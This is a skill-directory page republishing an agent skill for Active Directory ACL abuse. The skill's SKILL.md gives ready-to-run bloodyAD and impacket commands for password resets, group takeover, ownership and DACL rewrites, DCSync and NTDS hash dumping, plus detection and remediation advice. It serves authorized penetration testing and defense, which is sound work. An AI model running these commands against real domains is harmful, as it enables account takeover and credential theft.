Authorization Bypass Detection
Tencent/AI-Infra-Guard
Probes an AI agent through dialogue for cross-user data access, privilege escalation and login bypass, and reports confirmed findings as structured vulnerability entries.
Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication…
$ npx skills add ADScanPro/Claude-AD --skill acl-abuse -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install ADScanPro/Claude-AD acl-abuse --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/acl-abuse .claude/skills/acl-abuse && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "acl-abuse" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/acl-abuse into .claude/skills/acl-abuse/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "acl-abuse", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/ADScanPro/Claude-AD/tree/main/skills/acl-abuseType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add ADScanPro/Claude-AD --skill acl-abuse -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install ADScanPro/Claude-AD acl-abuse --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .agents/skills && cp -r skills-src/skills/acl-abuse .agents/skills/acl-abuse && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "acl-abuse" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/acl-abuse into .agents/skills/acl-abuse/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "acl-abuse", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add ADScanPro/Claude-AD --skill acl-abuse -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install ADScanPro/Claude-AD acl-abuse --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/skills/acl-abuse .cursor/skills/acl-abuse && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "acl-abuse" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/acl-abuse into .cursor/skills/acl-abuse/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "acl-abuse", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/ADScanPro/Claude-AD.git --path skills/acl-abuse--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add ADScanPro/Claude-AD --skill acl-abuse -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install ADScanPro/Claude-AD acl-abuse --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/skills/acl-abuse .gemini/skills/acl-abuse && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "acl-abuse" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/acl-abuse into .gemini/skills/acl-abuse/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "acl-abuse", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install ADScanPro/Claude-AD acl-abuseInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add ADScanPro/Claude-AD --skill acl-abuse -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .github/skills && cp -r skills-src/skills/acl-abuse .github/skills/acl-abuse && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "acl-abuse" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/acl-abuse into .github/skills/acl-abuse/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "acl-abuse", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add ADScanPro/Claude-AD --skill acl-abuse -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install ADScanPro/Claude-AD acl-abuse --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/skills/acl-abuse .opencode/skills/acl-abuse && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "acl-abuse" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/acl-abuse into .opencode/skills/acl-abuse/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "acl-abuse", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
acl-abuseAbusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication…
Acl Abuse is an agent skill from ADScanPro/Claude-AD. Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication rights via DS-Replication-Get-Changes-All). Use when BloodHound CE shows an outbound control edge from a principal you own toward a higher-value object, and you want the exact bloodyAD/impacket command to weaponize that ACE, plus detection and remediation. DCSync is covered here strictly as a post-compromise technique…
Its SKILL.md is about 2.6k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.
It sits in Security, covering Red teaming and adversary simulation. The repository describes itself as: Active Directory pentest methodology for Claude Code: skills, agents and slash commands for internal AD red-team work (Kerberoasting, ADCS ESC1-17, DCSync, ACL abuse, NTLM relay… The licence is MIT.
Read from SKILL.md and the folder at commit 73efec5. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
No scripts in the folder and no shell commands in SKILL.md.
From the folder's file list and the shell code blocks in SKILL.md.
Links to these hosts (documentation or services it may open):
thehacker.recipesFrom URLs in SKILL.md, links to its own repository left out.
Names no API keys, tokens, secrets or passwords.
From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Acl Abuse loads about 2.6k tokens when it runs. Until then it costs about 138 tokens; SKILL.md has 1,002 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check found no risky patterns in SKILL.md.
Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.
The full file from ADScanPro/Claude-AD at commit 73efec5, republished under its MIT licence (© ADScanPro). 1,002 words, ~2,620 tokens.
.claude/skills/acl-abuse/SKILL.md (or your agent's skills folder).Active Directory permissions are a graph. A single misconfigured Access Control Entry (ACE), say a low-priv user with GenericAll over a group, WriteDacl over a computer, or WriteOwner over an OU, is a directed edge you can walk from where you are toward Domain Admin. This skill turns those edges into concrete commands with bloodyAD and impacket, after BloodHound CE (Apache-2.0, genuinely open source) has drawn the path.
Find the paths first (BloodHound CE). Collect with a standard collector, import into BloodHound CE, and look at the outbound control edges from your owned principal: GenericAll, GenericWrite, WriteDacl, Owns/WriteOwner, AddMember, ForceChangePassword, AllExtendedRights, and DCSync. Pre-built queries like "Shortest paths from Owned principals" and "Find principals with DCSync rights" hand you the chain.
Collect edges with a standard collector, for example:
nxc ldap 10.0.0.10 -u user -p 'Password123' --bloodhound --collection All --dns-server 10.0.0.10or run rusthound-ce / SharpHound CE and import the ZIP into BloodHound CE.
MITRE ATT&CK: T1222 (Permission Modification) / T1098 (Account Manipulation)
What it is. Full control over the target object. What you do with it depends on the target type:
DONT_REQ_PREAUTH and AS-REP roast.msDS-AllowedToActOnBehalfOfOtherIdentity) and impersonate (see the Kerberos skill).Reset a user's password:
bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \
set password TARGETUSER 'NewPass123!'Add yourself to a group:
bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \
add groupMember 'Domain Admins' owneduserTargeted Kerberoast (set an SPN you control, then roast, see Kerberos skill):
bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \
set object TARGETUSER servicePrincipalName -v 'fake/svc'
GetUserSPNs.py -request-user TARGETUSER -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123'MITRE ATT&CK: T1098
What it is. Write non-protected attributes on the target. Enough to set an SPN (targeted Kerberoast), set DONT_REQ_PREAUTH (targeted AS-REP roast), or write msDS-AllowedToActOnBehalfOfOtherIdentity on a computer (RBCD). Not enough to reset the password directly on a user (that is ForceChangePassword / GenericAll).
Set the preauth-disabled flag for a targeted AS-REP roast:
bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \
add uac TARGETUSER -f DONT_REQ_PREAUTH
GetNPUsers.py -dc-ip 10.0.0.10 -request CORP.LOCAL/owneduser:'Password123'Write RBCD on a computer you can then S4U through:
bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \
add rbcd TARGET$ EVIL$MITRE ATT&CK: T1098
What it is. The User-Force-Change-Password extended right lets you reset the target user's password without knowing the old one. Straight account takeover of that user.
bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \
set password TARGETUSER 'NewPass123!'impacket alternative:
net rpc password TARGETUSER 'NewPass123!' -U 'CORP.LOCAL/owneduser%Password123' -S 10.0.0.10Note: resetting an in-use account is noisy and disruptive; it locks the real user out. Prefer targeted Kerberoast/AS-REP where the edge allows, and coordinate password resets with the client.
MITRE ATT&CK: T1098
What it is. Write access to a group's member attribute. Add a principal you control to a privileged group (a nested group that eventually reaches Domain Admins is just as good).
bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \
add groupMember 'Backup Operators' owneduserMITRE ATT&CK: T1222.001 (Windows Permission Modification)
What it is. You can rewrite the target's DACL, so you grant yourself whatever ACE you want (up to full control) and then exploit that. The common escalation is to grant yourself the replication rights on the domain object (setting up DCSync, see below) or GenericAll on a user/group.
Grant yourself an ACE on the target (impacket dacledit):
dacledit.py -action write -rights FullControl -principal owneduser \
-target-dn 'CN=TargetUser,CN=Users,DC=corp,DC=local' \
-dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123'bloodyAD equivalent (grant a right on an object):
bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \
add genericAll 'CN=TargetUser,CN=Users,DC=corp,DC=local' owneduserMITRE ATT&CK: T1222.001
What it is. You can set yourself as the owner of the target object. The owner can always rewrite the DACL, so WriteOwner chains into WriteDACL into full control. Two steps: take ownership, then grant yourself rights.
Take ownership (impacket owneredit):
owneredit.py -action write -new-owner owneduser \
-target-dn 'CN=TargetUser,CN=Users,DC=corp,DC=local' \
-dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123'Then grant yourself full control with dacledit (as above), then exploit as GenericAll.
bloodyAD one-liner for ownership:
bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \
set owner 'CN=TargetUser,CN=Users,DC=corp,DC=local' owneduserMITRE ATT&CK: T1003.006 (OS Credential Dumping: DCSync)
Frame this correctly. DCSync is not a user entry path. It is a post-compromise credential-extraction technique performed by a principal that already holds the directory replication extended rights, DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, on the domain object. In a healthy domain those rights belong only to Domain Controllers and to Domain/Enterprise Admins, so being able to DCSync normally means you are already Domain Admin (or the equivalent). It matters to ACL abuse only in one specific case: a non-DC, non-admin principal has been mis-granted those replication rights, usually as the result of a WriteDACL/WriteOwner chain above. In that case DCSync is the payoff of the ACL abuse, still executed after you have obtained (or granted yourself) the replication rights, never before.
So the ACL entry point is the mis-granted right (or granting it to yourself via WriteDACL on the domain object); the DCSync itself is the follow-on.
Grant the replication rights (only if you have WriteDACL on the domain head, the abusable misconfiguration):
dacledit.py -action write -rights DCSync -principal owneduser \
-target-dn 'DC=corp,DC=local' -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123'Then, holding those rights, replicate secrets (impacket secretsdump):
secretsdump.py -just-dc-user 'CORP\krbtgt' CORP.LOCAL/owneduser:'Password123'@10.0.0.10
secretsdump.py -just-dc CORP.LOCAL/owneduser:'Password123'@10.0.0.10 # full dumpnetexec equivalent:
nxc smb 10.0.0.10 -u owneduser -p 'Password123' --ntdsDumping krbtgt enables Golden Tickets; dumping the Administrator hash enables pass-the-hash. Both are post-DA persistence, not entry.
userAccountControl flips, RBCD writes, and owner changes. Watch the AttributeLDAPDisplayName (e.g. nTSecurityDescriptor, member, servicePrincipalName, msDS-AllowedToActOnBehalfOfOtherIdentity).1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (Get-Changes) and 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 (Get-Changes-All) requested by a principal that is not a Domain Controller, which is the tell that a non-DC is replicating.DS-Replication-Get-Changes-All. Remove it from every user/group/service account that has it.WriteDacl/WriteOwner on DC=corp,DC=local is game over; lock it to Tier-0.MachineAccountQuota to 0 to kill the RBCD-via-new-computer variant.member on privileged groups; alert on 4662 replication access from non-DCs.Only exploit ACLs on systems you are authorized to test. Password resets are disruptive; coordinate. Use lab/generic DNs and names in write-ups.
© ADScanPro, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
Just SKILL.md in skills/acl-abuse of ADScanPro/Claude-AD.
Open the folder on GitHubat commit 73efec5
Acl Abuse next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| Acl Abuse this skillADScanPro/Claude-AD | 211 | — | ~2.6k | Automated safety check: Pass | MIT | |
| Authorization Bypass DetectionTencent/AI-Infra-Guard | 6.8k | — | ~753 | Automated safety check: Pass | Apache-2.0 | |
| Run Assert Evalresponsibleai/ASSERT | 330 | — | ~11k | Automated safety check: Notes | MIT | |
| Osint Methodologyelementalsouls/Claude-OSINT | 2.8k | — | ~8.7k | Automated safety check: Notes | MIT | |
| Lfd Designelvisun/loss-function-development | 176 | — | ~2.9k | Automated safety check: Notes | MIT | |
| Web Exfiltration DetectionTencent/AI-Infra-Guard | 6.8k | — | ~1.8k | Automated safety check: Pass | Apache-2.0 |
Tencent/AI-Infra-Guard
Probes an AI agent through dialogue for cross-user data access, privilege escalation and login bypass, and reports confirmed findings as structured vulnerability entries.
responsibleai/ASSERT
Run an ASSERT evaluation against a described risk. An agent skill from responsibleai/ASSERT.
elementalsouls/Claude-OSINT
Comprehensive OSINT methodology for external red-team operations and authorized attack-surface assessments.
elvisun/loss-function-development
Design a loss function and harness for a long-running /goal optimization run (loss-function development, LFD).
Tencent/AI-Infra-Guard
Probes whether an agent with web fetch and stored user memory can be tricked by a malicious page into leaking data through chained URL paths.
Tencent/AI-Infra-Guard
Probes whether an agent can be hijacked by instructions hidden in documents, retrieved chunks or fetched web pages, using test prompts that embed a hidden instruction.
ADScanPro/Claude-AD
Real-world Active Directory environment constraints that silently break attacks when ignored: NTLM disabled (Kerberos fallback), AES-only KDCs (RC4 blocked by GPO), LDAP signing and channel binding…
ADScanPro/Claude-AD
The telemetry each Active Directory technique generates and what alerts a defender: Kerberoasting produces Event 4769 with RC4 encryption (0x17) and an MDI alert, DCSync produces Event 4662 with the…
ADScanPro/Claude-AD
Active Directory Certificate Services (AD CS) escalation techniques ESC1 through ESC17, driven by hand with Certipy (ly4k).
ADScanPro/Claude-AD
Authentication coercion (PetitPotam MS-EFSR, PrinterBug MS-RPRN, DFSCoerce MS-DFSNM) chained into NTLM relay (impacket ntlmrelayx) toward LDAP, AD CS web enrollment (ESC8), or SMB.
ADScanPro/Claude-AD
Kerberos-based Active Directory attacks driven by hand with standard tooling (Kerberoasting, AS-REP roasting, and delegation abuse: unconstrained, constrained/S4U, RBCD).
ADScanPro/Claude-AD
A high-level conceptual mapping from Active Directory attack techniques to the compliance controls they touch.
Categories
Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication…. Acl Abuse is an agent skill from ADScanPro/Claude-AD. Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication rights via DS-Replication-Get-Changes-All).
Acl Abuse fits situations like: bloodHound CE shows an outbound control edge from a principal you own toward a higher-value object; you want the exact bloodyAD/impacket command to weaponize that ACE; plus detection and remediation.
Run `npx skills add ADScanPro/Claude-AD --skill acl-abuse -a claude-code`. Or copy the skill folder (skills/acl-abuse in ADScanPro/Claude-AD) into .claude/skills/acl-abuse in your project. Claude Code loads it when a task matches its description.
Run `npx skills add ADScanPro/Claude-AD --skill acl-abuse -a codex`. Or copy the skill folder (skills/acl-abuse in ADScanPro/Claude-AD) into .agents/skills/acl-abuse in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add ADScanPro/Claude-AD --skill acl-abuse -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/acl-abuse, .gemini/skills/acl-abuse, .github/skills/acl-abuse and .opencode/skills/acl-abuse in your project.
SKILL.md names no scripts, command-line tools or credentials: Acl Abuse is instructions for the agent only.
SKILL.md names 1 domain. As links in the text: thehacker.recipes. This is read from the text; nothing was executed.
Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.
Acl Abuse is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.
About 2.6k tokens (SKILL.md is roughly 10k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.
Skills that share tags, products or a category with Acl Abuse: Authorization Bypass Detection (Tencent/AI-Infra-Guard, 6.8k stars), Run Assert Eval (responsibleai/ASSERT, 330 stars), Osint Methodology (elementalsouls/Claude-OSINT, 2.8k stars) and Lfd Design (elvisun/loss-function-development, 176 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
ADScanPro (a GitHub user) maintains it in ADScanPro/Claude-AD, which has 211 GitHub stars. The repository holds 7 skills in this directory. The repository was last updated on August 24, 2026.
Source: ADScanPro/Claude-AD on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.